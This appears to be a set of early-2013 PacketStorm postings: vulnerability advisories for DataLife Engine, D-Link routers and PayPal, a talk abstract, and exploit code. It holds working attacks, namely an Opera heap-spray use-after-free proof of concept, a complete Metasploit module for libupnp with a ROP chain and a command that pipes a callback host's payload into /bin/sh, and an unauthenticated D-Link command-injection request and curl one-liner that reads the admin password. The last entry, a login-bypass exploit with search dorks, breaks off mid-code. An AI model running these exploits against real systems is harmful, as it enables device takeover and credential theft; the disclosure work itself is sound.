DataLife Engine versions 9.7 and below appear to suffer from a session fixation vulnerability. ----------------------------------------------------------- (PT-2012-53) Positive Technologies Security Advisory Privilege Gaining in DataLife Engine ----------------------------------------------------------- ---[ Vulnerable software ] DataLife Engine Version: 9.7 and earlier Application link: http://dle-news.ru/ ---[ Severity level ] Severity level: Medium Impact: Privilege gaining Access Vector: Remote CVSS v2: Base Score: 6.8 Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) CVE: not assigned ---[ Software description ] DataLife Engine is a website management system. ---[ Vulnerability description ] Positive Technologies experts have detected a session management vulnerability that allows attackers to conduct Session Fixation attack in DataLife Engine. Session cookies are not discarded that allows attackers to conduct the attack. The attacker with access to evil.host.ru sub domain (or using Cross-Site Scripting) is able to set Cookie: PHPSESSID=123; domain=.host.ru in user's browser and as logged in to dle.host.ru, the user can use 123 session that now has privileges of the authorized user. ---[ How to fix ] Update your software up to the latest version. ---[ Advisory status ] 30.10.2012 - Vendor is notified 30.10.2012 - Vendor gets vulnerability details 19.01.2013 - Vendor releases fixed version and details 04.02.2013 - Public disclosure ---[ Credits ] The vulnerability has discovered by Timur Yunusov, Positive Research Center (Positive Technologies Company) ---[ References ] http://en.securitylab.ru/lab/PT-2012-53 http://dle-news.ru/bags/v97/1549-patchi-bezopasnosti-dlya-versii-97.html Reports on the vulnerabilities previously discovered by Positive Research: http://ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/ ---[ About Positive Technologies ] Positive Technologies www.ptsecurity.com is among the key players in the IT security market in Russia. The principal activities of the company include the development of integrated tools for information security monitoring (MaxPatrol); providing IT security consulting services and technical support; development of the Securitylab leading Russian information security portal. Among the clients of Positive Technologies, there are more than 40 state enterprises, more than 50 banks and financial organizations, 20 telecommunication companies, more than 40 plant facilities, as well as IT, service and retail companies from Russia, the CIS countries, the Baltic States, China, Ecuador, Germany, Great Britain, Holland, Iran, Israel, Japan, Mexico, the Republic of South Africa, Thailand, Turkey, and the USA. Positive Technologies is a team of highly skilled developers, advisers and experts with years of vast hands-on experience. The company specialists possess professional titles and certificates; they are the members of various international societies and are actively involved in the IT security field development. Source: PacketStorm

Opera appears to suffer from a SVG use-after-free vulnerability. <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink"> <g id="group"> <defs> <clipPath id="clip-circle" clip-path="url(#clip-rect)"> </clipPath> <clipPath id="clip-rect"> </clipPath> </defs> <circle id="rect" x="10" y="10" width="100" height="100" fill="green" /> </g> <script><![CDATA[ //Author=Cons0ul var b = new Array(); // this is our spray function where spray is allocated on LFH with exact size 0x78 // so 0x78 size of block is created so far we are creating 0x50000 blocks // to create 0x78 blocks we are using ArrayBuffer(); function feng_shui(){ for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection for(i=0;i<0x50000;i++){ payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine payload[0]=0x6c payload[1]=0x03 payload[2]=0xfe payload[3]=0x7f b.push(payload) } } // bug is use after free in handling of (use tag + clippath) witch try to access freed object // document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)"); var c = document.createElement('use'); c.setAttribute("xlink:href","rect") feng_shui(); document.getElementById('clip-rect').appendChild(c); document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug window.opera.collect() // <------ gc() frees the allocation feng_shui(); // <------------ we allocate our code at freed memory // at the end it tries freed block witch contains our data window.location.href=window.location.href; /* idc !heap -p -a ecx address 077c45e0 found in _HEAP @ b40000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 077c45d8 0010 0000 [00] 077c45e0 00078 - (free) PS C:\Users\cons0ul> idc db ecx 077c45e0 92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00 .H.............. 077c45f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4600 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4620 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 077c4650 00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88 ..........j[.... PS C:\Users\cons0ul> idc r eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048 eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 Opera_6b430000!OpGetNextUninstallFile+0xf8583: 6b8c998b ff5008 call dword ptr [eax+8] ds:0023:7ffe489a=???????? */ ]]></script> </svg> Source: PacketStorm

Description: SCADA HMI software provides a "control panel" interface to SCADA/ICS systems, allowing system operators and engineers the capability to visually monitor and make changes to parameters in the system. Many HMI packages provide the ability to authenticate users, to allow access to dangerous or sensitive controls and data to specific users, while restricting other users to observation or less sensitive areas of the system. Microsoft Bob was a failed Microsoft project from 1995: an attempt to make computers easy for end-users by providing a non-technical captive interface of "rooms" that users could move around, use the launch programs, and store files. Cartoon guides helped users with every step of the way. Thanks to an overly-helpful cartoon dog that would offer to change your password for you if you forgot it, it's frequently used as an example of bad security design choices. In this presentation, Wesley will point out the similarities and differences between Microsoft Bob and SCADA HMI software, and demonstrate previously unpublished vulnerabilities in the HMI systems that are very reminiscent of the problems with Microsoft Bob (which will also be demonstrated!). For penetration testers, the techniques used to quickly identify these vulnerabilities will be discussed, as well as mitigations for those who have to defend such systems. Robert McGrew is currently a lecturer and researcher at Mississippi State University's National Forensics Training Center, which provides free digital forensics training to law enforcement and wounded veterans. He has interests in both penetration testing and digital forensics, resulting in some interesting combinations of the two. He has written tools useful to both fields (NBNSpoof, msramdmp, GooSweep), and tries to stay involved and interactive with the online infosec community. He is currently expanding and exposing the rest of the security community to the SCADA HMI research he began with the release of user authentication vulnerabilities in the iFIX HMI product. Twitter: @McGrewSecurity McGrewSecurity Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Scada Hmi And Microsoft Bob: Modern Authentication Flaws With A 90'S Flavor

This Metasploit module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution', 'Description' => %q{ This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload. }, 'Author' => [ 'hdm', # Exploit dev for Supermicro IPMI 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI 'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-5858' ], [ 'US-CERT-VU', '922681' ], [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { # # # The following BadChars do not apply since we stage the payload # # through a secondary connection. This is just for reference. # # 'BadChars' => # # Bytes 0-8 are not allowed # [*(0..8)].pack("C*") + # # 0x09, 0x0a, 0x0d are allowed # "\x0b\x0c\x0e\x0f" + # # All remaining bytes up to space are restricted # [*(0x10..0x1f)].pack("C*") + # # Also not allowed # "\x7f\x3a" + # # Breaks our string quoting # "\x22", # Unlimited since we stage this over a secondary connection 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', # specific payloads vary widely by device (openssl for IPMI, etc) } }, 'Targets' => [ [ "Automatic", { } ], # # ROP targets are difficult to represent in the hash, use callbacks instead # [ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", { # The callback handles all target-specific settings :callback => :target_supermicro_ipmi_131, # This matches any line of the SSDP M-SEARCH response :fingerprint => /Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi # # SSDP response: # Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1 # http://192.168.xx.xx:49152/IPMIdevicedesc.xml # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03) } ], [ "Debug Target", { # The callback handles all target-specific settings :callback => :target_debug } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 29 2013')) register_options( [ Opt::RHOST(), Opt::RPORT(1900), OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) ], self.class) end def exploit configure_socket target_info = choose_target unless self.respond_to?(target_info[:callback]) print_error("Invalid target specified: no callback function defined") return end buffer = self.send(target_info[:callback]) pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:uuid:schemas:device:" + buffer + ":end\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n\r\n" print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...") r = udp_sock.sendto(pkt, rhost, rport, 0) 1.upto(5) do ::IO.select(nil, nil, nil, 1) break if session_created? end # No handler() support right now end # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc def target_supermicro_ipmi_131 # Create a fixed-size buffer for the payload buffer = Rex::Text.rand_text_alpha(2000) # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char() buffer[0,1] = '"' buffer[1999,1] = '"' # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] # Restart the service and use openssl to stage the real payload # Staged because only ~150 bytes of contiguous data are available before mangling cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#" buffer[432, cmd.length] = cmd # Adjust $r3 to point from the bottom of the stack back into our buffer buffer[304,4] = [0x4009daf8].pack("V") # # 0x4009daf8: add r3, r3, r4, lsl #2 # 0x4009dafc: ldr r0, [r3, #512] ; 0x200 # 0x4009db00: pop {r4, r10, pc} # The offset (right-shifted by 2 ) to our command string above buffer[284,4] = [0xfffffe78].pack("V") # # Copy $r3 into $r0 buffer[316,4] = [0x400db0ac].pack("V") # 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1 # 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4) # Move our stack pointer down so as not to corrupt our payload buffer[320,4] = [0x400a5568].pack("V") # 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198 # 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc} # Finally return to system() with $r0 pointing to our string buffer[141,4] = [0x400add8c].pack("V") return buffer =begin 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev 00032000-00055000 rwxp 00000000 00:00 0 [heap] 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so 40015000-40017000 rwxp 00000000 00:00 0 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so 40036000-40078000 rwxp 00000000 00:00 0 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so 40185000-40187000 rwxp 00000000 00:00 0 bd600000-bd601000 ---p 00000000 00:00 0 bd601000-bd800000 rwxp 00000000 00:00 0 bd800000-bd801000 ---p 00000000 00:00 0 bd801000-bda00000 rwxp 00000000 00:00 0 bdc00000-bdc01000 ---p 00000000 00:00 0 bdc01000-bde00000 rwxp 00000000 00:00 0 be000000-be001000 ---p 00000000 00:00 0 be001000-be200000 rwxp 00000000 00:00 0 be941000-be956000 rwxp 00000000 00:00 0 [stack] =end end # Generate a buffer that provides a starting point for exploit development def target_debug buffer = Rex::Text.pattern_create(2000) end def stage_real_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) self.service.on_client_connect_proc = Proc.new { |client| stage_real_payload(client) } # Start the listening service self.service.start end # # Shut down any running services # def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.kind_of?(Rex::Service) if self.service.kind_of?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end def choose_target # If the user specified a target, use that one return self.target unless self.target.name =~ /Automatic/ msearch = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n\r\n" # Fingerprint the service through SSDP udp_sock.sendto(msearch, rhost, rport, 0) res = nil 1.upto(5) do res,addr,info = udp_sock.recvfrom(65535, 1.0) break if res and res =~ /^(Server|Location)/mi udp_sock.sendto(msearch, rhost, rport, 0) end self.targets.each do |t| return t if t[:fingerprint] and res =~ t[:fingerprint] end if res and res.to_s.length > 0 print_status("No target matches this fingerprint") print_status("") res.to_s.split("\n").each do |line| print_status(" #{line.strip}") end print_status("") else print_status("The system #{rhost} did not reply to our M-SEARCH probe") end fail_with(Exploit::Failure::NoTarget, "No compatible target detected") end # Accessor for our TCP payload stager attr_accessor :service # We need an unconnected socket because SSDP replies often come # from a different sent port than the one we sent to. This also # breaks the standard UDP mixin. def configure_socket self.udp_sock = Rex::Socket::Udp.create({ 'Context' => { 'Msf' => framework, 'MsfExploit' => self } }) add_socket(self.udp_sock) end # # Required since we aren't using the normal mixins # def rhost datastore['RHOST'] end def rport datastore['RPORT'] end # Accessor for our UDP socket attr_accessor :udp_sock end Source: PacketStorm

D-Link DIR-600 and DIR-300 suffer insecure cryptographic storage, remote command execution, information disclosure, and insecure password changing vulnerabilities. Device Name: DIR-600 / DIR 300 - HW rev B1 Vendor: D-Link ============ Vulnerable Firmware Releases - DIR-300: ============ Firmware Version : 2.12 - 18.01.2012 Firmware Version : 2.13 - 07.11.2012 ============ Vulnerable Firmware Releases - DIR-600: ============ Firmware-Version : 2.12b02 - 17/01/2012 Firmware-Version : 2.13b01 - 07/11/2012 Firmware-Version : 2.14b01 - 22/01/2013 ============ Device Description: ============ D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network. Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r... German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro... ============ Shodan Torks ============ Shodan search: Server: Linux, HTTP/1.1, DIR-300 Server: Linux, HTTP/1.1, DIR-600 ============ Vulnerability Overview: ============ * OS Command Injection (unauthenticated) => Parameter cmd The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd to compromise the device. WARNING: You do not need to be authenticated to the device! Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png starting a telnet server: Request: POST /command.php HTTP/1.1 Host: 192.168.178.222 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.178.222/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache cmd=telnetd; You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details. For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray* Nmap Scan after starting the telnetd: Nmap scan report for 192.168.178.222 Host is up (0.022s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 1/tcp filtered tcpmux 23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!! <snip> Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png * Information disclosure: Nice server banner to detect this type of devices easily: Server: Linux, HTTP/1.1, DIR-300 Ver 2.12 Server: Linux, HTTP/1.1, DIR-600 Ver 2.12 * For changing the current password there is no request to the current password With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: # cat var/passwd "admin" "test" "0" Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue: http://en.securitylab.ru/lab/PT-2011-30 With the current version of the firmware the passwords are stored again in plaintext. If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device: root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php "admin" "THESECRETPASS" "0" root@bt:~# * Information Disclosure: Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network. Request: http://Target-IP/DevInfo.txt or try to access version.txt and have a look at the html source Response: HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267 Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: <snip> WAN MAC: <snip> WLAN MAC: <snip> These details are available without authentication. * Local path disclosure Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths. Request: http://<IP>/router_info.xml Response: HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-300 Ver 2.12 Date: Sat, 01 Jan 2000 21:22:43 GMT Content-Type: text/xml Content-Length: 49 EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1) * Stored XSS via WLAN Assistent and Version Details Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input. => Parameter: SSID The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated http://Target-IP/version.txt ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/m1adv2013-003 Video: http://www.s3cur1ty.de/home-network-horror-days ============ Time Line: ============ 14.12.2012 - discovered vulnerability 14.12.2012 - contacted dlink with the new vulnerability details via webinterface 20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link 21.12.2012 - D'link responded that they will check the findings *h00ray* 11.01.2013 - requested status update 25.01.2013 - requested status update 25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ... 25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better 04.02.2013 - no more responses from D'Link, public release ===================== Advisory end ===================== Source: PacketStorm

PayPal.com suffered from a persistent script injection vulnerability. Title: ====== Paypal Bug Bounty #20 - Persistent Web Vulnerabilities Date: ===== 2013-01-25 References: =========== http://www.vulnerability-lab.com/get_content.php?id=682 PayPal UID: fxv444khi VL-ID: ===== 682 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a Web Vulnerability in Paypal Labs Fundraising Widget Web Application. Report-Timeline: ================ 2012-08-13: Researcher Notification & Coordination 2012-08-14: Vendor Notification 2012-09-13: Vendor Response/Feedback 2013-01-12: Vendor Fix/Patch (PayPal Inc) 2013-01-25: Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation vulnerabilities are detected in Paypal Labs Fundraising Widget. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the Generate Widgets module with the bound vulnerable your name, your website, image url and supporters parameter listing. Attackers can inject own malicious script code as name, website url, image url or as supporter link to generate evil fundraising widgets. The execution of the script code occurs in the main listing out of the account index or the generated widget file output listing. Exploitation requires low user interaction or low privileged application user account. Successful exploitation of the vulnerability leads to persistent session hijacking (admin/mod/customer), account steal via persistent web attack or stable (persistent) context manipulation. Vulnerable Service(s): [+] Fundraising Widgets [https://giving.paypallabs.com/] Vulnerable Module(s): [+] Generate Widgets Vulnerable Parameter(s): [+] your name [+] your website [+] image url [+] supporters Affected Section(s): [+] Giving PaypalLabs Account Index [+] Generated widget output file Proof of Concept: ================= The persistent web vulnerabilities can be exploited by remote attackers with low privileged application user account and with low or medium required user inter action. For demonstration or reproduce ... Session: https://giving.paypallabs.com/authenticate/myaccount?token=HA-CYR26UHWRK8CS Time: 17:58 - 18:10 (EU) 2012-08-13 Review: Your giving widgets - Account Index <tr> <td height="20" width="20"><img src="myaccount-Dateien/spacer.gif" height="1" width="20"></td> <td align="left" height="20" valign="top" width="10"><img src="myaccount-Dateien/dot.gif" height="7" width="2"></td> <td class="gap" title="-1' " align="left" height="20" width="110"><[PERSISTENT INJECTED SCRIPT CODE!]")' <"=""><a href="/authenticate/view_campaign?campaign=38284">-1' "><[PERSISTENT INJECTED SCRIPT CODE!]") <</a></td> <td width="20" height="20"><img src="/images/spacer.gif" width="20" height="1" /></td> </tr> Review: Review Badge - Link <a name='b_60df8340c78b012fbb8a000d60d4c902'></a><object type='application/x-shockwave-flash' data='https://giving.paypallabs.com/flash/badge.swf' width='205' height='350' id='badge60df8340c78b012fbb8a000d60d4c902' align='middle'> <param name='allowScriptAccess' value='always' /> <param name='allowNetworking' value='all' /> <param name='movie' value='https://giving.paypallabs.com/flash/badge.swf' /> <param name='quality' value='high' /> <param name='bgcolor' value='#FFFFFF' /> <param name='wmode' value='transparent' /> <param name='FlashVars' value='Id=60df8340c78b012fbb8a000d60d4c902'/> <embed src='https://giving.paypallabs.com/flash/badge.swf' FlashVars='Id=60df8340c78b012fbb8a000d60d4c902' quality='high' bgcolor='#FFFFFF' wmode='transparent' width='205' height='350' Id='badge60df8340c78b012fbb8a000d60d4c902' align='middle' allowScriptAccess='always' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed> </object> Risk: ===== The security risk of the persistent script code inject vulnerability is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source PacketStorm

Free Monthly Websites version 2.0 suffers from administrative login bypass and remote shell upload vulnerabilities. ========================================================================================== Free Monthly Websites 2.0 Multiple Vulnerabilities ========================================================================================== :----------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Free Monthly Websites 2.0 Multiple Vulnerabilities : # Date : 04 February 2013 : # Author : X-Cisadane : # Vendor : http://www.freemonthlywebsites2.com/ : # Download : http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip : # Version : 2.0 : # Category : Web Applications : # Vulnerability : Admin Login Bypass and Shell Upload Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas :----------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:/index_ebay.php "Powered by: Resell Rights Fortune" "Generating Traffic to Your Site with Keyword Based Articles" Powered By: Free Monthly Websites 2.0 Proof of Concept ================ [ 1 ] Admin Login Bypass Vulnerable page http://target.com/[path]/admin/index.php Line 40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> 41 <input type="hidden" name="do_type" value="admin_settings_read"> Vulnerable page http://target.com/[path]/admin/login.php Line 40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> 41 <input type="hidden" name="do_type" value="admin_settings_read"> Vulnerable page http://target.com/[path]/admin/file_io.php Line 14 if($_REQUEST[do_type]=="admin_settings_read") 15 { 16 $filename="settings/admin_settings.txt"; 17 18 if(!$handle = fopen($filename, 'r')) 19 { 20 echo "Cannot open file ($filename)"; 21 exit; 22 } 23 $contents = fread($handle, filesize($filename)); 24 fclose($handle); 25 $argument_arr=explode("#_1_#",$contents); 26 27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass]) 28 { 29 